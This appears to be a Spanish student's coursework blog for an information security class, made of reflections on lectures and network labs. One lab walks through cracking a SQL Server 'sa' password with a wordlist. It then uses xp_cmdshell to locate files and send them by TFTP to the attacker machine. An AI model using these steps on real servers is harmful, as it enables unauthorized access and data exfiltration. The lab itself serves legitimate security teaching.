Exposición 8 Plan de contingencia

EXPOSICIÓN 8

La realización de esta exposición trataba sobre:
Plan de contingencia

Fecha de realización: 24 de noviembre del 2014

Reflexión: Esta fue la octava exposición nos hablaron sobre las estrategias planificadas y la serie de procedimientos que debemos seguir en caso de presentarnos en una, al igual que tipo de soluciones podemos implementar, nos presentaron diversos tipos de planes además de probar nuevas soluciones, también nos hablaron de metodologías como la OCTAVE, la NIST y la MAGARIT, cada una de ellos cuenta con sus respectivos pasos y su secuencia de fases para llevarla acabo me pareció muy interesante cuando mencionaron los desastres naturales.






Exposición 7 Políticas de Seguridad

EXPOSICIÓN 7

La realización de esta exposición trataba sobre:
Políticas de seguridad

Fecha de realización: 21 de noviembre del 2014

Reflexión: Esta fue la séptima exposición nos hablaron sobre las políticas de seguridad y una serie de instrucciones que traían documentadas, nos hablaron del objetivo de las políticas, nos mencionaron normas y leyes que se adaptan la seguridad, confidencialmente y disponibilidad de la información de la cual se esta tratando, el principio dice que cada elemento que lo compone es responsable de cada área que esta encargado, cada de estos tendrá consecuencias, por eso no se debe jugar con estas cosas también nos mostraron un manual donde venia especificado cada una de las normas lo mas interesante era de México.





Exposición 6 Diseño de arquitectura de seguridad

EXPOSICIÓN 6

La realización de esta exposición trataba sobre:
Diseño de arquitectura de seguridad

Fecha de realización: 20 de noviembre del 2014

Reflexión: Esta fue la sexta exposición nos hablaron sobre las arquitecturas de seguridad estas deben cumplir características básicas, sobre la seguridad perimetral es un conjunto de sistemas de detección electrónica diseñada  para proteger parámetros interiores y exteriores de esta seguridad. detecta, difunde, y frena a intrusos que se quieren robar la información, muchas empresas se defienden de estas vulnerabilidades utilizando diversas herramientas si no se hiciera eso en vez de que las empresas ganaran dinero perderían más de lo que producieran es un tema muy importante a tratar




Exposición 5 Dispositivos de seguridad

EXPOSICIÓN 5

La realización de esta exposición trataba sobre:
Dispositivos de seguridad

Fecha de realización: 19 de noviembre del 2014

Reflexión: Esta fue la quinta exposición nos hablaron sobre la seguridad Informática que es catalogada una disciplina, técnicas,aplicaciones y dispositivos encargados de asegurar la integridad y privacidad de la información de un sistema Informático, existen dos tipos de seguridad la lógica y la física, también nos hablaron de amenazas que amenazan nuestra seguridad y de algunas herramientas como el detector de movimiento y el funcionamiento al igual nos mostraron dos videos que hablaban de seguridad.




Exposición 4 Estándares de seguridad

EXPOSICIÓN 4

La realización de esta exposición trataba sobre:
Estandares de Seguridad

Fecha de realización: 18 de noviembre del 2014

Reflexión: Esta fue la cuarta exposición aquí nos explicaron sobre las normas ISO, cuales eran sus características e implementación de estas mismas,también los pilares básicos y que es lo que tenemos hacer para poder tener estar certificaciones que son muy importantes, nos hablaron de COBIT  que es una herramienta para gestionar información, las medidas de seguridad y presentan por lo general políticas y procedimientos, en la mayoría de los casos las empresas ya cuentan con software para protegerse contra contingencias me pareció muy interesante






Exposición 3 Hacker Ético

EXPOSICIÓN 3

La realización de esta exposición trataba sobre:
Hacker Ético

Fecha de realización: 14 de noviembre del 2014

Reflexión: Esta fue la tercera exposición en el cual mi equipo hablamos sobre un tema muy importante el cual es el hacking ético les presentamos los tipos de hackers que existen en este medio, cuales son las características de cada uno de ellos, los elementos esenciales en la seguridad en tomar en cuenta para que no nos puedan hacer daños, a lo largo de la exposición también presentamos diversas herramientas para poderse aprender un poco de estas herramientas que en su defecto nos servirán para evitar riesgos



Exposición 2 Legislación Mexicana de Seguridad

EXPOSICIÓN 2

La realización de esta exposición trataba sobre:
Legislación Mexicana de Seguridad

Fecha de realización: 13 de noviembre del 2014

Reflexión: Esta fue la segunda exposición nos hablaron de Secretarias que están asociadas a la Legislación Mexicana de Seguridad, también mencionaron muchos artículos los cuales tienen relación, también mencionaron algunos artículos de la Ley Federal de telecomunicaciones y nos mencionaron un poco de lo que es la firma electrónica y cuando se acordó el uso de esta y los efectos que estos tuvieron cuando se implemento como las reglas generales para la gestión de la comunicación presentados ante la secretaría de Gobernación me pareció muy interesante los artículos.






Exposición 1 Metodologías para la implementación de la seguridad

EXPOSICIÓN 1

La realización de esta exposición trataba sobre:
Metodologías para la implementación de la seguridad

Fecha de realización: 12 de noviembre del 2014

Reflexión: Esta fue la primera exposición aquí vimos diferentes tipos de metodologías las cuales se pueden implementar en las empresas para la evaluación de riesgos complementarios dentro de la empresa para tomar en cuenta la seguridad en ciertas áreas, tenemos que fijar muy bien los objetivos y tener la valoración del riesgo activo acumulado en la función de la metodología, existen un sin fin de metodologías para tener protegido dentro de nuestra organización la información y cosas importantes










Tópicos avanzados de seguridad

MODULO IV

TÓPICOS AVANZADOS DE SEGURIDAD


En esta unidad revisamos los tópicos avanzados de seguridad, el cual son métodos actuales para la protección de los sistemas de información de personas ajenas a la empresa y también de accidentes que puedan ocurrir.



Práctica 3 - IpSec (DMZ)

PRÁCTICA 3 - IPSEC (DMZ)


Fecha de realización: 7 de noviembre del 2014

Reflexión: En esta Practica teníamos que configurar un DMZ a partir de NAT y ACL se establecerá entre las interfaces con diferentes características al momento de establecer access-list y también utilizamos las WILDCARD y abrir la pantalla de las computadoras  para realizar ping entre ellas una vez establecido esto todos los pings deberían hacer exitosos hacia la DMZ (RED) que fue configurada


Práctica 3 -IpSec (VPN)

PRÁCTICA 3 - IPSEC (VPN)


Fecha de realización: 7 de noviembre del 2014

Reflexión: En esta Practica teníamos que configurar un VPN que es un enlace cifrado a través de un túnel inseguro, el túnel cifrado es entre redes privadas se establecerá entre los routers (router 0 y router 1) para ello teníamos que seguir los pasos que venían indicados en la practica y hacer configuraciones en los routers aqui utilizaremos el servicio ISAKMP para este servicio vimos que existen diversos comandos para que nos arrojen resultados de como esta conectada la topología.


Práctica 3 - IpSec (RipV2)

PRÁCTICA 3 - IPSEC (RIPV2)


Fecha de realización: 7 de noviembre del 2014

Reflexión: En esta Practica tuvimos configurar una red como la que se nos mostraba al principio de la configuración, con las interfaces establecidas, una vez que la teniamos conectada teniamos que agregarle mas fastethernet a los routers, una vez teniendo la topología lo que teniamos que hacer era configurarla con RIP VERSION 2 para que pudieran hacer ping entre las computadoras de eso trataba la primera parte (1/3)  para la practica, dos redes eran privadas la otra era de internet.


Práctica 2 - Inyección de código

PRÁCTICA 2 - INYECCIÓN DE CÓDIGO

  • Utilización de herramienta HAVIJ para inyección de código

Fecha de realización: 4 de noviembre del 2014

Reflexión:La reflexión que me deja esta actividad fue que gracias a ella pudimos darnos cuenta que no existe sólo una manera de inyectar código a una base de datos, sino al contrario, existen varias ya, las cuales más que para atacar un sistema, nosotros como ingenieros podemos utilizarlas para prevenir esas vulnerabilidades que puede tener un acceso a nuestras bases de datos por medio de internet. El puesto 88 es vulnerable a estos ataques.

   

Práctica 1 - SQL Server

PRÁCTICA 1 - SQL SERVER

  • SQL Server (Valor 10 puntos TRABAJO ENTREGABLE)

Fecha de realización: 4 de noviembre del 2014

Reflexión: Los diseños de la base de datos sera cuidando ciertas especificaciones y caracteristicas para que en un futuro no nos tengamos que preocupar por la seguridad ya que existintes diversas maneras de poder corrumpir los datos en una base de datos que este con vulnerabilidades para esto debemos estudiar a fondo y realizar un ánalisis por donde nos pueden atacar y asi proteger esos lados que son más propensos a sufrir un ataque.           


*INSTALACIÓN DE SUPERSCAN

 *EJECUTAMOS LA HERRAMIENTA SQLPING:

*EJECUTAMOS LA HERRAMIENTA DE LA BASE DE DATOS, AQUÍ QUEDA YA CONFIGURADA EL PUERTO 1433


Fase 2.
En este ejercicio, se utilizará la herramienta SQLDict, montando un ataque por diccionario para encontrar la contraseña de acceso de la cuenta administrativa “sa”.

Tarea
Pasos Detallados
1.      Ejecutar SQLDict.
a.      Ejecute el programa sqldict.exe desde el USB

b.      En el campo Target server IP, introduzca 192.168.1.100

c.       En el campo Target Account, asegúrese que se encuentra sa por default.

d.      Seleccione Load Password File

e.      Navegue a su USB, localice y seleccione el archivo passwords.txt.

Nota: el archivo Passwords.txt  contiene una selección de las palabras más frecuentes que son utilizadas como contraseñas de acceso para diversos servicios. Este archivo pertenece al CD “Openwall Wordlist Collection”, disponible en http://openwall.net

f.        Seleccione Start. Después de algunos minutos, deberá aparecer la contraseña.
EJECUTAMOS LA HERRAMIENTA SQLDICT, EN TARGET SERVER IP PONEMOS LA IP DE NUESTRA COMPUTADORA, EN TARGET ACCOUNT PONEMOS EL USUARIO EN LOAD PASSORD CARGAMOS EL ARCHIVO .TXT Y LE DAMOS START:


Fase 3.
En este ejercicio, se usara las herramientas administrativas Management Studio para conectarse a un servidor y, aprovechando la existencia de una cuenta de login que se instala por default, obtener el control total del servidor de bases de datos, en forma remota y con privilegios administrativos.

Tarea
Pasos Detallados
1.      Configurar la herramienta Enterprise Manager, conectarse al servidor y controlarlo en forma remota.
a.      Ejecute la herramienta administrativa Management Studio en el menú Start | Programs | Microsoft SQL Server 2005 | SQL Server Management Studio Express

b.      En Nombre de servidor, introduzca 192.168.1.100

c.       En Autenticación, seleccione Autenticación de SQL Server. Introduzca la cuenta sa, con la contraseña que crackeo en el ejercicio anterior. Haga click en Conectar.

INSTALACIÓN DE MYSQL SERVER MANAGEMENT STUDIO EXPRESS
EJECUTE LA HERRAMIENTA ADMINISTRATIVA MANAGEMENT STUDIO EN EL MENÚ START | PROGRAMS | MICROSOFT SQL SERVER 2005 | SQL SERVER MANAGEMENT STUDIO EXPRESS

EN NOMBRE DE SERVIDOR, INTRODUZCA 192.168.5.41

EN AUTENTICACIÓN, SELECCIONE AUTENTICACIÓN DE SQL SERVER. INTRODUZCA LA CUENTA SA, CON LA CONTRASEÑA QUE CRACKEO EN EL EJERCICIO ANTERIOR. HAGA CLICK EN CONECTAR



Fase 4.
En este ejercicio, se instalará un servidor TFTP en la computadora atacante para permitir la recepción y envío de archivos sin autenticación. Este software es necesario debido a que el sistema operativo Windows contiene un cliente TFTP, pero no el componente servidor.

Tarea
Pasos Detallados
1.      Instalar un servidor TFTP
a.      Inserte la memoria USB.

b.      Abra el explorador de Windows, y navegue a la ubicación del software TFTP Server:
Carpeta HERRAMIENTAS SQL

c.       Ejecute el software instalador de TFTP Server, SolarWinds-TFTP-Server.exe, aceptando las opciones por default que presenta el asistente. Si le solicita el CD de instalación de Microsoft Office, presione Cancelar.

d.      En la opción File – Configure, seleccione la pestaña  Security, activando la opción “Transmit and Receive files”. Presione “OK”.

EJECUCION DEL INSTALADOR TFTP SERVER SOLAR:
ACEPTAMOS LAS OPCIONES POR DEFAULT SERVER SOLAR:

INTERFAZ DEL PROGRAMA SERVER SOLAR:







OPCION FILE-CONFIGURE, SELECCIONAMOS LA PESTAÑA SECURITY Y ACTIVAMOS LA OPCIÓN TRANSMIT AND RECEIVE FILES SERVER SOLAR:

Fase 5.
En este ejercicio, se empleará la herramienta administrativa Query Analizer para conectarse al servidor remoto y ejecutar comandos del sistema operativo para navegar el disco duro. Este escenario simula la presencia de un archivo en el servidor que nos interesa encontrar y transferir hacia la computadora atacante.


Tarea
Pasos Detallados
1.      Conectarse al servidor remoto
a.      En SQL Server Management Studio, selecciona Nueva consulta.

2.      Ejecutar el extended stored procedure xp_cmdshell para buscar y transferir un archivo hacia el hacker
a.      En la ventana de consultas, introduzca y ejecute el siguiente comando para localizar cualquier archivo de texto que usaremos como ejemplo.

xp_cmdshell ‘dir c:\*.txt /s’

b.      Active el servidor TFTP en la computadora atacante: menú Start | Programs | SolarWinds 2001 Standard Edition | File Transfer | TFTP Server.

c.       Transfiera el archivo encontrado hacia el equipo cliente, ejecutando el siguiente stored procedure:

xp_cmdshell ‘tftp –i 192.168.1.# PUT path’

Sustituya # por el número de estudiante que usted tiene asignado. Sustituya la palabra path por la ruta completa del archivo encontrado en el punto “a”. Si la ruta contiene espacios en blanco, necesita incluirla entre comillas “ ”.

Por ejemplo, si el archivo que desea transferir es c:\program files\test.txt, ejecute:

xp_cmdshell ‘tftp -i  192.168.1.# PUT “c:\program files\test.txt”’

d.      Verifique que el archive se transfirió hacia la computadora atacante, revisando el contenido del directorio c:\TFTP-root (el directorio que se configure por default para enviar y recibir archives por TFTP).


Actividad 7 Resultados de la práctica DMZ

ACTIVIDAD 7

  • Resultados de práctica DMZ

Fecha de realización: 07 de noviembre del 2014

Reflexión: En esta actividad teníamos que seguir los pasos del escenario 2, configurar un DMZ, apartir de NAT y ACL'S, aprendí nuevos comandos como inside y outside que son para las interfaces internas y externas, las cuales las características de cada router entre sí, también debemos configurar lista de accesos de lo que se trataba que las redes privadas pudieran tener conexión pero lo que controlaba todo era el servidor DMZ .





Actividad 6 Resultados de la práctica VPN

ACTIVIDAD 6

  • Resultados de la práctica VPN

Fecha de realización: 07 de noviembre del 2014

Reflexión: En esta actividad teníamos que seguir una serie de pasos guiándonos de un PDF, en el cual aprendimos un poco de lo que sera CISCO4, me parecio muy interesante aunque los comandos son muy diferentes, consistía en crear un tunel el cual las redes eran privadas y había una red de Internet, me pareció muy interesante esta actividad ya que aprendimos que quería decir cada comando en el router.



Actividad 5 Aplicaciones web con seguridad en internet

ACTIVIDAD 5

  • Lista 5 aplicaciones web que utilizan esquemas de seguridad en internet
  • Explicar el método utilizado en cada una de estas y/o representarlo con algún esquema.

Fecha de realización: 4 de noviembre del 2014

Reflexión:En esta actividad teníamos que identificar 5 aplicaciones web las cuales utilizan esquemas de seguridad en contra de sus vulnerabilidades en internet al igual que varios métodos utilizando dependiendo de que es lo que estamos hablando ya que existen un sin fin de personas que nos quieren hacer daño aplicando su conocimiento para mal y debemos encontrar esas vulnerabilidades


Actividad 4 5 vulnerabilidades de una base de datos

ACTIVIDAD 4

  • Lista 5 vulnerabilidades de la base de datos según estadísticas de seguridad, referencia el origen de datos

Fecha de realización: 30 de octubre del 2014

Reflexión: En esta actividad teníamos que investigar 5 vulnerabilidades dentro de las base de datos yo encontré las vulnerabilidades mas comunes en las estadísticas de seguridad, la mayoría de la base de datos aún no son 100% seguras por eso es un área no explorada el cual podemos tomar ventaja para desarrollar algo que nos ayude a tener bien resguardada nuestra información.



Actividad 3 Evaluación de vulnerabilidades en un S.O

ACTIVIDAD 3

  • Realiza la evaluación de un sistema operativo, en este caso el que tomé como punto de referencia fue Windows Vista tomando como base la guía propuesta por la profesora.

Fecha de realización: 29 de octubre del 2014

Reflexión: En esta actividad teníamos que leer una guía la cual nos mostraba en las vulnerabilidades e investigar un sistema operativo las cuales teníamos que analizar que vulnerabilidades tenían a lo largo del tiempo que fue desarrollado este programa, estos fueron algunos problemas que encontré en los diferentes servicios que nos brinda Windows